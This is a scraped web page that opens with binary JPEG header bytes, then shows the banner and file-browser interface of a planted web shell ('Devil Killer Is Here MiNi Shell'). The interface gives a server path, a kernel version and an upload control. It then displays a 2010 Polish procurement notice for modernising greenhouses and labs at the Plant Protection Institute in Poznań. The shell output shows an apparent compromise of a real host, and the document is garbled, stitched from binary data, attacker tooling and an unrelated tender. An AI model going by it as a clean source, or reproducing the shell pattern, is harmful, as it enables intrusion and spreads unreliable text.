JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100310/66670-N-2010.html

<p class="kh_header"><b>Poznań: Wykonanie robót związanych z realizacją projektu pt. Modernizacja laboratoriów dla wzmocnienia innowacyjności badań w zakresie ochrony roślin i działań na rzecz gospodarki- finansowanego ze środków Programu Operacyjnego Innowacyjna Gospodarka, Działanie 2.1. - na bazie istniejących obiektów w Instytucie Ochrony Roślin w Poznaniu przy ul. Władysława Węgorka 20</b><br>
<b>Numer ogłoszenia: 66670 - 2010; data zamieszczenia: 10.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Ochrony Roślin-Państwowy Instytut Badawczy , ul. Władysława Węgorka 20, 60-318 Poznań, woj. wielkopolskie, tel. 061 8649000, faks 061 8676301.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ior.poznan.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka badawczo-rozwojowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót związanych z realizacją projektu pt. Modernizacja laboratoriów dla wzmocnienia innowacyjności badań w zakresie ochrony roślin i działań na rzecz gospodarki- finansowanego ze środków Programu Operacyjnego Innowacyjna Gospodarka, Działanie 2.1. - na bazie istniejących obiektów w Instytucie Ochrony Roślin w Poznaniu przy ul. Władysława Węgorka 20.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wartość szacunkowa przedmiotu zamówienia: poniżej progów ustalonych na podstawie art. 11 ust. 8 Prawa zamówień publicznych (4845000 euro).
Uwagi dotyczące sposobu realizacji zamówienia:
Projekt pt. Modernizacja laboratoriów dla wzmocnienia innowacyjności badań w zakresie ochrony roślin i działań na rzecz gospodarki - jest współfinansowany ze środków Unii Europejskiej ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka. Instytut Ochrony Roślin-PIB jest zobligowany do respektowania zwartej z MNiSW umowy, która ściśle określa warunki realizacji projektu. Warunki te będą również obowiązywały wykonawcę projektu. W szczególności dotyczyć to będzie harmonogramu, terminów wykonywania poszczególnych zadań-etapów, płatności. Wszelkie zmiany ww. umowy dotyczące realizacji projektu w części budowlanej muszą być respektowane przez wykonawcę.

Postępowanie obejmuje realizację 4 zadań:
1. Modernizacja kompleksu szklarni Zakładu Wirusologii i Bakteriologii IOR-PIB.
2. Modernizacja kompleksu szklarni Zakładu Badania Środków Ochrony Roślin IOR-PIB.
3. Modernizacja laboratoriów przygotowawczych.
4. Modernizacja laboratoriów Zakładu Wirusologii i Bakteriologii IOR-PIB

Zgodnie z harmonogramem:
Realizacja zadania nr 1 ma nastąpić w terminie: od IV 2010 r. do 30 III 2012 r.
Realizacja zadania nr 2 ma nastąpić w terminie: od IV 2010 r. do 30 III 2012 r.
Realizacja zadania nr 3 ma nastąpić w terminie: od VII 2011 r do 31 XII 2012 r.
Realizacja zadania nr 4 ma nastąpić w terminie: od VII 2011 r do 31 XII 2012 r.

Opis przedmiotu zamówienia:
A. Przedmiotem zamówienia jest: wykonanie robót budowlanych związnych z realizacją projektu pt. Modernizacja laboratoriów dla wzmocnienia innowacyjności badań w zakresie ochrony roślin i działań na rzecz gospodarki- finansowanego ze środków Programu Operacyjnego Innowacyjna Gospodarka, Działanie 2.1.- dla zadania Nr 1 p.n.  Modernizacja kompleksu 4 szt. szklarni dla Zakładu Wirusologii i Bakteriologii oraz dla zadania Nr 2 p.n. Modernizacja kompleksu 4 szt. szklarni dla Zakładu Środków Ochrony Roślin na bazie istniejących obiektów w Instytucie Ochrony Roślin w Poznaniu przy ul. Władysława Węgorka 20.
Przedmiot zamówienia obejmuje nw branże:
1.Branża budowlana
2. Branża instalacyjna:
- instalacja c.o.
- instalacja wody
- instalacja kanalizacyjna
- instalacja klimatyzacyjno - wentylacyjna
- instalacja elektryczna i automatyki

Celem projektu jest wykonanie modernizacji szklarni na bazie istniejących obiektów oraz stworzenie szklarni o charakterze laboratorium naukowo - badawczego, w którym zastosowane rozwiązania techniczno - technologiczne, jak również rozwiązania funkcjonalno - przestrzenne stworzą odpowiednie warunki do prac badawczych oraz zajęć dydaktycznych.
Stan istniejący:
Obiekt do modernizacji to istniejące szklarnie połączone między sobą łącznikiem tworzące jedną bryłę. Dla zadania projektu Nr 1 oraz Nr 2 szklarnie posiadają następujące parametry;
- ilość szklarni - 4 szt.
- szerokość szklarni - 6,0m
- długość szklarni - 24m
- wysokość szklarni do okapu - 2,55m
- ilość łączników 3 szt.
- długość łącznika - 24,0m
- wysokość łącznika do okapu - 2,55m
Przy układzie zblokowanym bryła tworzy wymiar 28,0 x 24,0m w ilości 2 kpl. 
Segment 1 i segment 2)
Wyposażenie istniejących szklarni;
- wietrzenie linkowe
- parapety stałe
- instalacje; elektryczna, wodna, kanalizacyjna, i ciepłownicza
- czopuchy i kraty wentylacyjne

Program użytkowy.
Projekt budowlany w poszczególnych branżach uwzględnia warunki układu funkcjonalno - przestrzennego z wprowadzeniem pełnej automatyki do regulacji parametrów danych kamer szklarni oraz zastosowanie nowych rozwiązań technologicznych. Modernizacja polega na wykonaniu: 
- wymiany istniejącej obudowy stalowej na obudowę aluminiową przygotowaną do szklenia podwójnego
- ścianek działowych połączonych z cokołem i posadzką
- wietrzenia sekcyjnego dla każdej kamery
- przesłon termicznych wewnętrznych i zewnętrznych
- parapetów aluminiowych na kołach
- konstrukcji do płynnej regulacji wysokości lamp doświetlania asymilacyjnego
- drzwi przesuwnych i rozwiernych
- instalacji:
1.centralnego ogrzewania
2. wodną
3. kanalizacyjną
4. zamgławiania wysokociśnieniowego
5. klimatyzacji oraz wentylacji
6. elektryczną z automatyką i stacją METEO

B. Przedmiotem zamówienia jest: wykonanie robót budowlanych związnych z realizacją projektu pt.Modernizacja laboratoriów dla wzmocnienia innowacyjności badań w zakresie ochrony roślin i działań na rzecz gospodarki- finansowanego ze środków Programu Operacyjnego Innowacyjna Gospodarka, Działanie 2.1.- w zakresie zadania Nr 3 Modernizacja laboratoriów przygotowawczych oraz dla zadania Nr 4 p.n. Modernizacja laboratoriów i głównych ciągów komunikacyjnych w Zakładzie Wirusologii i Bakteriologii w budynkach nr 6 i 7 w Instytucie Ochrony Roślin w Poznaniu przy ul. Władysława Węgorka 20.
Przedmiot zamówienia obejmuje nw branże:
1.Branża budowlana
2. Branża instalacyjna:
- instalacja c.o.
- instalacja wody
- instalacja kanalizacyjna
- instalacja wentylacyjna
- instalacja elektryczna.
Celem projektu jest wykonanie modernizacji pomieszczeń w celu dostosowania ich do prac laboratoryjnych o wysokim stopniu jakości.

Zakres projektu:
Projekt obejmuje:
1. projekt architektoniczno-budowlany przewiduje wykonanie prac ogólnobudowlanych i branżowych w celu przygotowania laboratoriów do prowadzenia prac o wysokim standardzie jakościowym

2. projekt instalacji sanitarnych:
- przebudowa instalacji centralnego ogrzewania: wymiana grzejników, wymiana zaworów grzejnikowych, demontaż centralnego odpowietrzenia, montaż odpowietrzników automatycznych na pionach centralnego ogrzewania w budynku nr 7,
- przebudowa węzła cieplnego: rozdział instalacji centralnego ogrzewania na potrzeby szklarni i na potrzeby budynku biurowego,
- przebudowa instalacji przygotowania ciepłej wody użytkowej,
- przebudowa instalacji wentylacji: dostosowanie wentylacji w poszczególnych pomieszczeniach tak, aby spełniały normy użytkowe w budynku nr 7,
- przebudowa instalacji sanitarnych: pomieszczenie przed szklarnią - wykonanie podejść instalacji wody i kanalizacji,
3. projekt instalacji elektrycznych:
- ułożenie linii kablowych zasilających wraz z modernizacją pola zasilającego w stacji transformatorowej i rozbudową złącz kablowych w budynkach,
- wykonanie wewnętrznych linii zasilających,
- montaż tablic głównych, na pierwszym piętrze i w piwnicy,
- wykonanie instalacji elektrycznej w łącznikach,
- wykonanie korytek dla instalacji elektrycznych wraz z oświetleniem podstawowym, awaryjnym i ewakuacyjnym w korytarzach w budynku nr 6..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7, 45.11.00.00-1, 45.11.12.00-0, 45.26.23.10-7, 45.26.23.11-4, 45.22.31.00-7, 45.43.00.00-4, 45.41.00.00-4, 45.44.21.00-8, 45.32.00.00-6, 45.42.10.00-4, 45.43.21.10-8, 45.44.10.00-0, 45.45.00.00-6, 45.33.20.00-3, 45.33.11.00-7, 45.33.12.10-1, 45.33.12.20-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w wysokości: 250000 zł (słownie: dwieście pięćdziesiąt tysięcy złotych 00/100)
2. Uwaga - w przetargu ograniczonym wadium wnoszą wykonawcy zaproszeni do składania ofert, nie składa się go na etapie wniosku o dopuszczenie do udziału w przetargu. Szczegółowe informacje dot. wadium zawarte będą w SIWZ, która zostanie przekazana Wykonawcom zaproszonym do składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie spełnienia wyżej wymienionego warunku - Wykonawca dołączy do wniosku oświadczenie. Ocena spełniania ww. warunku zostanie dokonana wg formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę realizacji na terenie Polski:
a. 4 robót budowlanych stanowiących 4 odrębne zamówienia o wartości powyżej 1 mln złotych netto-każda- polegających na wykonaniu lub modernizacji szklarni  specjalistycznych dla jednostek naukowo-badawczych, dydaktycznych (nie przeznaczonych do celów produkcyjnych-tylko do celów naukowych, badawczych, doświadczalnych itp.) w okresie ostatnich pięciu lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, oraz:
b. 3 robót ogólnobudowlanych stanowiących 3 odrębne zamówienia o wartości powyżej 500 tys. zł netto-każda- o wysokim standardzie sanitarno-higienicznym wyposażonych w automatykę, klimatyzację (np. obiekty szpitalne, farmaceutyczne, laboratoria itp.) w okresie ostatnich pięciu lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
Do wykazu należy dołączyć dokumenty potwierdzające, że roboty zgodne z ww. opisem (lit. a i b) zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone  (np. referencje).
Ocena spełniania ww. warunku zostanie dokonana wg formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie spełnienia wyżej wymienionego warunku - Wykonawca dołączy do wniosku oświadczenie. Ocena spełniania ww. warunku zostanie dokonana wg formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych (uprawnień), niezbędnych do wykonania zamówienia, a także z podaniem funkcji przy realizacji zamówienia. Wykonawca będzie zobowiązany wykazać min. 1 osobę posiadającą uprawnienia budowlane w zakresie przedmiotu zamówienia do pełnienia samodzielnych funkcji w kierowaniu robotami w każdej z nw specjalności: ogólnobudowlanej (kierownik budowy), elektrycznej, gazowej, sanitarnej (kierownicy robót branżowych) zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz.U. z 2006 r. Nr. 156 poz. 1128 z późn zmianami). Do wykazu personelu kierowniczego należy dołączyć dokumenty potwierdzające przygotowanie zawodowe osób wskazanych w ww. wykazie, tj. uprawnienia budowlane w zakresie przedmiotu zamówienia w specjalnościach ogólnobudowlanej, elektrycznej, gazowej, sanitarnej zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz.U. z 2006 r. Nr. 156 poz. 1128 z późn. zmianami) oraz aktualne na dzień składania wniosków o dopuszczenie do udziału w postępowaniu zaświadczenia o przynależności do właściwej Izby Samorządu Zawodowego, zgodnie z ustawą z 15 grudnia 2000 roku o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów - (Dz.U. z 2001 r nr 5 poz. 42 z późn. zmianami) - dla kierowników robót posiadających uprawnienia budowlane  w każdej z w/w specjalności.
Do wniosku muszą zostać załączone informacje na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami
Ocena spełniania ww. warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę:
1. posiadania środków finansowych lub zdolności kredytowej w wysokości nie mniejszej niż 1 000 000 zł (słownie: jeden milion złotych)  lub dla walut obcych na kwotę w wysokości równoważnej liczonej wg średniego kursu złotego w stosunku do walut obcych, ogłaszanego przez Narodowy Bank Polski, obowiązującego w dniu, w którym opublikowane zostało niniejsze ogłoszenie o zamówieniu w Biuletynie Zamówień Publicznych. Potwierdzeniem spełniania warunku będzie informacja z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzający wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków.
2. zysku w wysokości nie mniejszej niż 500000 zł (słownie: pięćset tysięcy złotych). Potwierdzeniem spełniania warunku będzie sprawozdanie finansowe albo jego część, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości  również z opinią odpowiednio o badanym sprawozdaniu albo jego części ,  a w przypadku wykonawców niezobowiązanych do sporządzenia sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności za okres ostatniego roku obrotowego a jeżeli okres prowadzenia działalności jest krótszy-za ten okres).
3.posiadania opłaconej polisy lub innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 5000000 zł (słownie: pięć milionów złotych)

Ocena spełniania ww. warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 1 rok obrotowy</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
